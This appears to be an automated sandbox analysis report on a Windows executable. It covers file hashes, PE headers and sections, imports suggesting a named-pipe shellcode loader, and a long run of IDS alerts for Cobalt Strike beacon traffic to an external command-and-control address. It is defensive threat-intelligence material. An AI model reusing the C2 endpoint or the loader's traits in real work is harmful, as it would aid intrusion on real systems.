SHA256:	a430979a8135771d0a0ffce9ef6755052ae788dec08e9a095d5e63f9b6f387f6
SHA512:	9e9f2b96d1b524e8945559f9e0982c60a6e5a2bd21493f0e9eae6b241750473d105316ed1a16c1e04b0a64af7e7548ed75374d8947e73aaada72d8365c799ffe
SSDEEP:	6144:eURR/+NIoAAM7LSae3Nw8ltR8ZllIhfSjJE/1Foa+nl:eUzXledw4RoSh3XoPn
TLSH:	5364AE7DEBB357CAD22187FD81AC5049389B3A638EF3BC31D11427960A22A94D5E3D74
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......cu........ ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x401ba0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	147442e63270e287ed57d33257638324

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0004EFF5h]
mov dword ptr [eax], 00000001h
call 00007F68FC80F32Fh
call 00007F68FC80EB1Ah
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0004EFC5h]
mov dword ptr [eax], 00000000h
call 00007F68FC80F2FFh
call 00007F68FC80EAEAh
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F68FC8107C4h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F68FC80EE49h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
jmp ecx
dec eax
arpl word ptr [00002AC2h], ax
test eax, eax
jle 00007F68FC80EE98h
cmp dword ptr [00002ABBh], 00000000h
jle 00007F68FC80EE8Fh
dec eax
mov edx, dword ptr [00052CFEh]
dec eax
mov dword ptr [ecx+eax], edx
dec eax
mov edx, dword ptr [00052CFBh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54000	0x8d8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x51000	0x2b8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x50060	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x54224	0x1e8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20a8	0x2200	ba98beafce4128c14539a20f3e854b25	False	0.5734145220588235	data	6.010394259460846	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4000	0x4bcf0	0x4be00	673fdc6b06fa0240286975d8efffe40b	False	0.6211774093904449	dBase III DBT, version number 0, next free block index 10, 1st item "BGJ>BGJ>BGJ>B\254I>2GJ>BGJ>BGJ>BgI>2AJ>BGJ>BGJ>BGJ>BGJ>BGJ>BGJ>l3/F6GJ>\300FI>BWJ>BEI>BCJ>BGJ>BGJ>BGJ>bGJ^l5._6&J>@\273J>BgI>B\271J>BAI>BGJ"	7.182180143480097	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x50000	0x910	0xa00	5fcc7830b4dcd602b35eeb7f1712e8fa	False	0.241796875	data	4.459688665734325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x51000	0x2b8	0x400	f88aef14dea168f37249daf0dce04c78	False	0.37890625	data	3.2311971178670404	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x52000	0x238	0x400	6ce9e303fb86766d702ecb2b174cf348	False	0.2578125	data	2.6337753778508075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x53000	0x9d0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x8d8	0xa00	3aae8d98b4d34bad008e73a14573bffd	False	0.323828125	data	3.966749721413537	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x55000	0x68	0x200	52d79e9aecf5d5c3145d3ec54aa197a8	False	0.0703125	data	0.2709192282599745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x56000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile

msvcrt.dll

__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T22:00:04.887327+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49730	89.197.154.116	7810	TCP
2024-10-07T22:00:04.887327+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49730	89.197.154.116	7810	TCP
2024-10-07T22:00:06.825937+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49731	89.197.154.116	7810	TCP
2024-10-07T22:00:06.825937+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49731	89.197.154.116	7810	TCP
2024-10-07T22:00:08.534715+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49732	89.197.154.116	7810	TCP
2024-10-07T22:00:08.534715+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49732	89.197.154.116	7810	TCP
2024-10-07T22:00:10.264513+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49733	89.197.154.116	7810	TCP
2024-10-07T22:00:10.264513+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49733	89.197.154.116	7810	TCP
2024-10-07T22:00:12.028170+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49734	89.197.154.116	7810	TCP
2024-10-07T22:00:12.028170+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49734	89.197.154.116	7810	TCP
2024-10-07T22:00:13.851716+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49735	89.197.154.116	7810	TCP
2024-10-07T22:00:13.851716+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49735	89.197.154.116	7810	TCP
2024-10-07T22:00:15.567674+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49736	89.197.154.116	7810	TCP
2024-10-07T22:00:15.567674+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49736	89.197.154.116	7810	TCP
2024-10-07T22:00:17.303031+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49737	89.197.154.116	7810	TCP
2024-10-07T22:00:17.303031+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49737	89.197.154.116	7810	TCP
2024-10-07T22:00:19.019522+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49738	89.197.154.116	7810	TCP
2024-10-07T22:00:19.019522+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49738	89.197.154.116	7810	TCP
2024-10-07T22:00:20.715916+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49741	89.197.154.116	7810	TCP
2024-10-07T22:00:20.715916+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49741	89.197.154.116	7810	TCP
2024-10-07T22:00:22.559096+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49745	89.197.154.116	7810	TCP
2024-10-07T22:00:22.559096+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49745	89.197.154.116	7810	TCP
2024-10-07T22:00:24.295931+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49747	89.197.154.116	7810	TCP
2024-10-07T22:00:24.295931+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49747	89.197.154.116	7810	TCP
2024-10-07T22:00:26.003982+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49748	89.197.154.116	7810	TCP
2024-10-07T22:00:26.003982+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49748	89.197.154.116	7810	TCP
2024-10-07T22:00:27.767095+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49749	89.197.154.116	7810	TCP
2024-10-07T22:00:27.767095+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49749	89.197.154.116	7810	TCP
2024-10-07T22:00:29.450557+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49750	89.197.154.116	7810	TCP
2024-10-07T22:00:29.450557+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49750	89.197.154.116	7810	TCP
2024-10-07T22:00:33.574658+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49751	89.197.154.116	7810	TCP
2024-10-07T22:00:33.574658+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49751	89.197.154.116	7810	TCP
2024-10-07T22:00:35.545658+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49752	89.197.154.116	7810	TCP
2024-10-07T22:00:35.545658+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49752	89.197.154.116	7810	TCP
2024-10-07T22:00:37.247360+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49753	89.197.154.116	7810	TCP
2024-10-07T22:00:37.247360+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49753	89.197.154.116	7810	TCP
2024-10-07T22:00:38.969491+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49754	89.197.154.116	7810	TCP
2024-10-07T22:00:38.969491+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49754	89.197.154.116	7810	TCP
2024-10-07T22:00:40.675331+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49755	89.197.154.116	7810	TCP
2024-10-07T22:00:40.675331+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49755	89.197.154.116	7810	TCP
2024-10-07T22:00:42.358293+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49756	89.197.154.116	7810	TCP
2024-10-07T22:00:42.358293+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49756	89.197.154.116	7810	TCP
2024-10-07T22:00:44.092723+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49757	89.197.154.116	7810	TCP
2024-10-07T22:00:44.092723+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49757	89.197.154.116	7810	TCP
2024-10-07T22:00:45.812862+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49758	89.197.154.116	7810	TCP
2024-10-07T22:00:45.812862+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49758	89.197.154.116	7810	TCP
2024-10-07T22:00:47.535783+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49759	89.197.154.116	7810	TCP
2024-10-07T22:00:47.535783+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49759	89.197.154.116	7810	TCP
2024-10-07T22:00:49.272785+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49760	89.197.154.116	7810	TCP
2024-10-07T22:00:49.272785+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49760	89.197.154.116	7810	TCP
2024-10-07T22:00:50.988910+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49761	89.197.154.116	7810	TCP
2024-10-07T22:00:50.988910+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49761	89.197.154.116	7810	TCP
2024-10-07T22:00:52.881734+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49762	89.197.154.116	7810	TCP
2024-10-07T22:00:52.881734+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49762	89.197.154.116	7810	TCP
2024-10-07T22:00:54.576802+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49763	89.197.154.116	7810	TCP
2024-10-07T22:00:54.576802+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49763	89.197.154.116	7810	TCP
2024-10-07T22:00:56.263309+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49764	89.197.154.116	7810	TCP
2024-10-07T22:00:56.263309+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49764	89.197.154.116	7810	TCP
2024-10-07T22:00:57.971739+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49765	89.197.154.116	7810	TCP
2024-10-07T22:00:57.971739+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49765	89.197.154.116	7810	TCP
2024-10-07T22:00:59.680335+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49767	89.197.154.116	7810	TCP
2024-10-07T22:00:59.680335+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49767	89.197.154.116	7810	TCP
2024-10-07T22:01:01.395075+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49769	89.197.154.116	7810	TCP
2024-10-07T22:01:01.395075+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49769	89.197.154.116	7810	TCP
2024-10-07T22:01:03.285490+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49780	89.197.154.116	7810	TCP
2024-10-07T22:01:03.285490+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49780	89.197.154.116	7810	TCP
2024-10-07T22:01:04.987483+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49791	89.197.154.116	7810	TCP
2024-10-07T22:01:04.987483+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49791	89.197.154.116	7810	TCP
2024-10-07T22:01:06.689132+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49807	89.197.154.116	7810	TCP
2024-10-07T22:01:06.689132+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49807	89.197.154.116	7810	TCP
2024-10-07T22:01:08.658738+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49818	89.197.154.116	7810	TCP
2024-10-07T22:01:08.658738+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49818	89.197.154.116	7810	TCP
2024-10-07T22:01:10.359503+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49825	89.197.154.116	7810	TCP
2024-10-07T22:01:10.359503+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49825	89.197.154.116	7810	TCP
2024-10-07T22:01:12.084607+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49840	89.197.154.116	7810	TCP
2024-10-07T22:01:12.084607+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49840	89.197.154.116	7810	TCP
2024-10-07T22:01:13.796875+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49851	89.197.154.116	7810	TCP
2024-10-07T22:01:13.796875+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49851	89.197.154.116	7810	TCP
2024-10-07T22:01:15.534739+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49857	89.197.154.116	7810	TCP
2024-10-07T22:01:15.534739+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49857	89.197.154.116	7810	TCP
2024-10-07T22:01:17.252714+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49868	89.197.154.116	7810	TCP
2024-10-07T22:01:17.252714+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49868	89.197.154.116	7810	TCP
2024-10-07T22:01:18.941423+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49879	89.197.154.116	7810	TCP
2024-10-07T22:01:18.941423+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49879	89.197.154.116	7810	TCP
2024-10-07T22:01:20.873023+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49894	89.197.154.116	7810	TCP
2024-10-07T22:01:20.873023+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49894	89.197.154.116	7810	TCP
2024-10-07T22:01:22.591355+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49906	89.197.154.116	7810	TCP
2024-10-07T22:01:22.591355+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49906	89.197.154.116	7810	TCP
2024-10-07T22:01:24.295453+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49918	89.197.154.116	7810	TCP
2024-10-07T22:01:24.295453+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49918	89.197.154.116	7810	TCP
2024-10-07T22:01:25.987531+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49931	89.197.154.116	7810	TCP
2024-10-07T22:01:25.987531+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49931	89.197.154.116	7810	TCP
2024-10-07T22:01:30.231283+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49939	89.197.154.116	7810	TCP
2024-10-07T22:01:30.231283+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49939	89.197.154.116	7810	TCP
2024-10-07T22:01:31.987185+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49964	89.197.154.116	7810	TCP
2024-10-07T22:01:31.987185+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49964	89.197.154.116	7810	TCP
2024-10-07T22:01:33.703695+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49974	89.197.154.116	7810	TCP
2024-10-07T22:01:33.703695+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49974	89.197.154.116	7810	TCP
2024-10-07T22:01:35.440140+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49985	89.197.154.116	7810	TCP
2024-10-07T22:01:35.440140+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49985	89.197.154.116	7810	TCP
2024-10-07T22:01:37.248186+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49999	89.197.154.116	7810	TCP
2024-10-07T22:01:37.248186+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	49999	89.197.154.116	7810	TCP
2024-10-07T22:01:38.959548+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50010	89.197.154.116	7810	TCP
2024-10-07T22:01:38.959548+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50010	89.197.154.116	7810	TCP
2024-10-07T22:01:40.674934+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50022	89.197.154.116	7810	TCP
2024-10-07T22:01:40.674934+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50022	89.197.154.116	7810	TCP
2024-10-07T22:01:42.555618+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50031	89.197.154.116	7810	TCP
2024-10-07T22:01:42.555618+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50031	89.197.154.116	7810	TCP
2024-10-07T22:01:44.253610+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50036	89.197.154.116	7810	TCP
2024-10-07T22:01:44.253610+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50036	89.197.154.116	7810	TCP
2024-10-07T22:01:45.937035+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50047	89.197.154.116	7810	TCP
2024-10-07T22:01:45.937035+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50047	89.197.154.116	7810	TCP
2024-10-07T22:01:47.705942+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50056	89.197.154.116	7810	TCP
2024-10-07T22:01:47.705942+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50056	89.197.154.116	7810	TCP
2024-10-07T22:01:49.411092+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50061	89.197.154.116	7810	TCP
2024-10-07T22:01:49.411092+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50061	89.197.154.116	7810	TCP
2024-10-07T22:01:51.121962+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50062	89.197.154.116	7810	TCP
2024-10-07T22:01:51.121962+0200	2036677	ET MALWARE Cobalt Strike Related Activity (GET)	1	192.168.2.4	50062	89.197.154.116	7810	TCP
2024-10-07T22:01:52.812386+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	50063	89.197.154.116	7810	TCP
